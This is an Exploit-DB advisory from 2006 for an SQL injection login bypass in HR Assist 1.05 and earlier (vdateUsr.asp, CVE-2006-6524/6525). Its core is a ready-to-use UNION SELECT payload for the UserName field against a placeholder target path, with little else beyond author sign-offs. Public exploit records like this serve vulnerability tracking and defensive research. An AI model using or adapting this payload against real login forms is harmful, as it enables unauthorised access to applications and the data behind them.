HR Assist <= 1.05 vdateUsr.asp Remote Login ByPass Vulnerability

2006-12-09T00:00:00
ID EDB-ID:2909
Type exploitdb
Reporter ajann
Modified 2006-12-09T00:00:00

Description

HR Assist <= 1.05 (vdateUsr.asp) Remote Login ByPass Vulnerability. CVE-2006-6524,CVE-2006-6525. Webapps exploit for asp platform

                                        
                                            *******************************************************************************
# Title   :  HR Assist &lt;= 1.05 (vdateUsr.asp) Remote Login ByPass SQL Injection
# Author  :  ajann
# Page    :  http://www.ezhrs.com
# Contact :   :(
# $$$     :  $45

*******************************************************************************
Example:

###http://[target]/[path]/

UserName: ' union select 0,0,0,0,0,0,0,0,0,0,0,0,0 from admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]